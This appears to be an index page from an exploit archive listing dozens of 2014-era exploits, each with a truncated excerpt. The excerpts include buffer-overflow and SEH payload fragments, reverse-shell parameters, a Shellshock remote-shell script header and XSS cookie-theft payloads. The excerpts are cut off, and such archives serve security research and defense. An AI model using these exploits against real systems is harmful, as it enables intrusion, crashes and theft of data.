WRT120N-1.0.0.7

WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password. Stack filler; needs to be 4 bytes except for the last stack frame where it needs to be 1 byte to account for the trailing "\n\n" and terminating NULL byte import sys import urllib2 try: target = sys.argv1...

PCMAN-FTP-2.07

Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow unauthenticated Date: Feb 19, 2014 Exploit Author: Sumit Version: 2.07 Tested on: Windows XP Professional SP3 Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command import socket import...

VideoCharge-Studio-2.12.3.685

Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse MITM Remote Code Execution Exploit SafeSEH/ASLR/DEP Bypass Version: v2.12.3.685 Date: 2014-02-19 Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.videocharge.com Tested on: Win7-GER DEP...

MiniHTTPd-1.21-exploit

The instability of the existing is down to bad chars, and the parent thread killing off the child thread when the thing is still running. This exploit allocates memory in a safe area, copies the payload to it, creates a new thread which runs the payload and then suspends the current thread. The...

Symantec-Endpoint-Protection-Manager

Symantec has an http request handler called ConfigServerHandler that is programmatically restricted to only handle requests that come from localhost. I guess when they wrote this they just assumed that there was never going to be a way to send untrusted input to it since it was always going to be...

python-socket.recvfrom_into()

Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...

Acunetix-Web-Vulnerability-Scanner

Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ /!\ Author is not responsible for any damage you cause This POC is for educational purposes only Video: https://www.youtube.com/watch?v=RHaMx8K1GeM while True: try: choice = intrawinput"...

Easy-Address-Book-Server-1.6

By setting UserID in the cookie to a long string, we can overwrite EDX which allows us to control execution flow when "call dword ptr edx+28h" is executed. EDX is overwritten with an address pointing to a location on the stack which in turn points to a NOP sled leading to the shellcode. This...

Easy-File-Web-Server-5.3-

This scripts exploits the buffer overflow vulnerability caused by an oversized UserID - string as discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not brute force the address of the overwritten stackpart, instead it uses code from its own .text segment to...

ZTE-and-TP-Link-RomPager

Date: 10-05-2014 Server Version: RomPager/4.07 UPnP/1.0 Tested Routers: ZTE ZXV10 W300 TP-Link TD-W8901G TP-Link TD-W8101G TP-Link TD-8840G Firmware: FwVer:3.11.2.175TC3086 HwVer:T14.F75.0 Tested on: Kali Linux x86 !/usr/bin/env python -- coding: utf-8 -- Exploit Title: ZTE and TP-Link RomPager D...

Gitlist-0.4.0

Date: 06/20/2014 Vendor Homepage: http://gitlist.org/ Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz Fixed in: 0.5.0 Tested on: Debian 7 More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ from commands import getoutput import urllib import sys """ Exploi...

Kolibri-WebServer-2.0-GET

Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit Exploit Author : Revin Hadi S Date : 14/07/2014 Vendor : http://www.senkas.com Version : 2.0 import socket, sys help = """Kolibri WebServer 2.0 Get Request SEH Exploit Target 1Windows XP SP2 Eng & Windows 2003 SP2 Eng 2Windows 7 SP1 En...

Omeka-2.2.1

Desc: Omeka suffers from an authenticated arbitrary PHP code execution. The vulnerability is caused due to the improper verification of uploaded files in '/admin/items/add' script thru the 'file0' POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP...

Oxwall-1.7.0

Oxwall suffers from an authenticated arbitrary PHP code execution. The vulnerability is caused due to the improper verification of uploaded files in '/admin/settings/user' script thru the 'avatar' and 'bigAvatar' POST parameters. This can be exploited to execute arbitrary PHP code by uploading a...

Kolibri-Webserver-2.0

This exploit will bypass all protections in EMET 5.0 and 4.1 but DEP. Date: September 30th 2014 Author: tekwizz123 Vendor Homepage: http://www.senkas.com Software Download: http://www.senkas.com/kolibri/download.php Version: 2.0 Tested on: Windows 7 32 bit, Windows 7 64 bit, Windows XP SP3 CVE-ID...

Apache-mod_cgi-Shellshock

Shellshock apache modcgi remote exploit rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages separated by comma proxy: host:port proxy ! /usr/bin/env python from...

Postfix-SMTP---Shellshock

Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bas...

Belkin-n750-jump-login-Parameter

Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/ A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103WW1.10.16m, allows an unauthenticated remote attacker to...

Apache-James-Server-2.3.2

Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip Version: Apache James Server 2.3.2 Tested on: Ubuntu, Debian Info: This exploit works on default installation of Apache James Server 2.3.2 Info: Example paths that will automatically execute payload on some action:...

LeapFTP-3.1.0-URL-Handling

Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit Google Dork: "k3170makan is totally awesome" hehehe Date: 2014-08-28 Exploit Author: k3170makan Vendor Homepage: http://www.leapware.com/ Software Link: http://www.leapware.com/download.html Version: 3.1.0 Tested on: Windows XP SP0 DoS on...

HTML-Help-Workshop-1.4

Date: 31/08/2014 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx Version: 1.4 Tested on: Windows XP SP3 / Windows 7 Pro import subprocess junk = "A" 832 Junk bytes nseh =...

Windows-OLE-Package-Manager

Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title: CVE-2014-4114 SandWorm builder Vendor Homepage: microsoft.com Tested on: Win7Sp1 64 bit - Microsoft Offcie 2013 Plus Demo: http://youtu.be/ljjEkhflpv import os import zipfile import sys ''' Very quick and ugly SandWorm...

Free-WMA-MP3-Converter-1.8

Free WMA MP3 Converter 1.8 Buffer Overflow Version:1.8 Build 20140226 Author:metacom Date:10.23.2014 Download:http://www.eusing.com/freewmaconverter/mp3wmaconverter.htm import struct def littleendianaddress: return struct.pack"L",address poc="\x41" 4112 eip=littleendian0x0045CD1A0045CD1A FFE4 JMP...

IBM-Tivoli-Monitoring-6.2.2

Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit CVE: CVE-2013-5467 Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni Author: Robert Jaroszuk Tested on: RedHat 5, Centos 5 Vulnerable version: IBM Tivoli Monitoring V6.2.2 other versions not tested !/bin/s...

iFTP-2.20-Buffer-Overflow-SEH

Exploit Title:i-FTP Buffer Overflow SEH Homepage:http://www.memecode.com/iftp.php Software Link:www.memecode.com/data/iftp-win32-v220.exe Version:i.Ftp v2.20 Win32 Release Vulnerability discovered:26.10.2014 Description:Simple portable cross platform FTP/SFTP/HTTP client. import struct def...

Microsoft-Office-2007-and-2010---OLE-Arbitrary-Command-Execution

CVE-2014-6352 OLE Remote Code Execution Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Tested on win7 - office 2007 and 2010...

Advantech-AdamView-GNI

!/usr/bin/env ruby Exploit Title: Advantech AdamView .gni SEH Buffer Overflow Date: Dec 09 2014 Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security Exploit Author: Muhamad Fadzil Ramli mind1355atgmail.com Software Link:...

VFU-4.10-1.1---Buffer-Overflow

VFU v4.10-1.1 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a...

jaangle-0.98i.977-DoS

jaangle 0.98i.977 Denial of Service Vulnerability Author: hadji samir , [email protected] Download : http://www.jaangle.com/downloading?block Tested : Windows 7 fr DATE : 2012-12-13 buff = "\x41" 30000 f = open"exploit.m3u",'w' f.write buff f.close...

Mediacoder-0.8.33-SEH

Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos .m3u Date: 11/29/2010 Author: Hadji Samir [email protected] Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe Version: 0.8.33 build 5680 buffer = "http://" + "A" 845 nseh = "B" 4 seh = "C" 4 junk = "D" 60 f=...

Windows-8.1-ahcache.sys

On Windows 8.1 update the system call NtApphelpCacheControl the code is actually in ahcache.sys allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to...

WhatsApp-Remote-Reboot

Custom message with non-printable characters will crash any WhatsApp client v2.11.476 for android. It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even engaging in an interactive conversation over WhatsApp protocol Mirror:...

Crea8Social 2.0 - Cross-Site Scripting Change Interface

Crea8Social 2.0 - Cross-Site Scripting Change Interface Exploit Title: Crea8Social v.2.0 XSS Change Interface Google Dork: intext:Copyright © 2014 CreA8social. Date: January 3, 2015 Exploit Author: r0seMary Vendor Homepage: http://crea8social.com Software Link:...

ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution

ASUSWRT 3.0.0.4.3761071 - LAN Backdoor Command Execution !/usr/bin/env python3 Exploit Title: ASUSWRT 3.0.0.4.3761071 LAN Backdoor Command Execution Date: 2014-10-11 Vendor Homepage: http://www.asus.com/ Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66UB1/FWRTN66U30043762524.zip...

PhotoPost 4.85 - Multiple Vulnerabilities

PhotoPost 4.85 - Multiple Vulnerabilities PhotoPost Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: PhotoPost Version: = 4.85 Website: http://www.photopost.com/ BID: 12157 CVE: CVE-2005-0273 CVE-2005-0274 OSVDB: 12741 12741 SECUNIA: 13680 PACKETSTORM: 35595 Description: PhotoPost w...

e107 2 Bootstrap CMS - Cross-Site Scripting

e107 2 Bootstrap CMS - Cross-Site Scripting | | | || / | |/' | | || | / / | /| \ / /\ | / / \ |/ / alertString.fromCharCode88, 83, 83 or "alertdocument.cookie ======== Credits: ======== Vulnerability found and advisory written by Ahmet Agar. =========== References: =========== http://www.0x97.inf...

ReviewPost 2.84 - Multiple Vulnerabilities

ReviewPost 2.84 - Multiple Vulnerabilities ReviewPost Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: ReviewPost Version: = 2.84 Website: http://www.reviewpost.com/ BID: 12159 CVE: CVE-2005-0270 CVE-2005-0271 CVE-2005-0272 OSVDB: 12703 12704 12705 12706 12707 12708 SECUNIA: 13697...

PhotoPost Classifieds 2.01 - Multiple Vulnerabilities

PhotoPost Classifieds 2.01 - Multiple Vulnerabilities PhotoPost Classifieds Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: PhotoPost Classifieds Version: = 2.01 Website: http://www.photopost.com/class/ BID: 12156 OSVDB: 12728 12729 12730 12731 12732 12733 12734 12735 12736 12737...

Absolut Engine 1.73 - Multiple Vulnerabilities

Absolut Engine 1.73 - Multiple Vulnerabilities Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS Advisory ID: SROEADV-2014-08 Author: Steffen Rösemann Affected Software: CMS Absolut Engine v. 1.73 Vendor URL: http://www.absolutengine.com/ Vendor Status: solved...

Microsoft Windows 8.1 (x86x64) - ahcache.sys NtApphelpCacheControl Privilege Escalation

Microsoft Windows 8.1 x86x64 - ahcache.sys NtApphelpCacheControl Privilege Escalation Source: https://code.google.com/p/google-security-research/issues/detail?id=118c1 Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35661-poc.zip Platform:...

Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting

Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability Date: 29-12-2014 Exploit Author: Halil Dalabasmaz Version: v1.5 Vendor Homepage: http://codecanyon.net/item/social-microblogging-pro/9217005 Tested on: Chrome &...

Liferay Portal 7.0.0 M17.0.0 M27.0.0 M3 - Remote Code Execution

Liferay Portal 7.0.0 M17.0.0 M27.0.0 M3 - Remote Code Execution !/bin/sh Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE Date: 11/16/2014 Exploit author: drone @dronesec Vendor homepage: http://www.liferay.com/ Software link:...

PHP-Calendar 0.10.1 - Arbitrary File Inclusion

PHP-Calendar 0.10.1 - Arbitrary File Inclusion PHP-Calendar Arbitrary File Inclusion Vendor: Sean Proctor Product: PHP-Calendar Version: = 0.10.1 Website: http://php-calendar.sourceforge.net/ BID: 12127 CVE: CVE-2004-1423 OSVDB: 12700 12701 SECUNIA: 22516 PACKETSTORM: 35563 Description: I was...

Bash-CMD-Injection

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment. Modified by JSacco - [email protected] Exploit Pack 2014 How to run: checkCVE20146271.py...

WhatsApp 2.11.476 (Android) - Remote RebootCrash App (Denial of Service)

WhatsApp 2.11.476 Android - Remote RebootCrash App Denial of Service Mirror: http://pastebin.com/raw.php?i=CZChGAnG Video: https://www.youtube.com/watch?v=V7bnLOohqqI !/usr/bin/python -- coding: utf-8 - Title: WhatsApp Remote Reboot/Crash App Android Product: WhatsApp Vendor Homepage:...

Pimcore CMS 2.3.03.0 - SQL Injection

Pimcore CMS 2.3.03.0 - SQL Injection Document Title: =============== Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability References Source: ==================== http://vulnerability-lab.com/getcontent.php?id=1363 Release Date: ============= 2014-12-16 Vulnerability Laboratory ID VL-ID:...

Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting

Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting Exploit Title: Easy File Sharing Webserver =6.8 Persistent XSS Date: 12/26/14 Exploit Author: SickPsycko Vendor Homepage: http://www.sharing-file.com/ Version:6.8 Tested on: Windows 7 32bit The exploit is within the username field...

phpList 3.0.63.0.10 - SQL Injection

phpList 3.0.63.0.10 - SQL Injection Document Title: =============== PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1358 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID VL-ID:...

PMB 4.1.3 - (Authenticated) SQL Injection

PMB 4.1.3 - Authenticated SQL Injection Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link:...

Wickr Desktop 2.2.1 Windows - Denial of Service

Wickr Desktop 2.2.1 Windows - Denial of Service Document Title: =============== Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1377 Video:...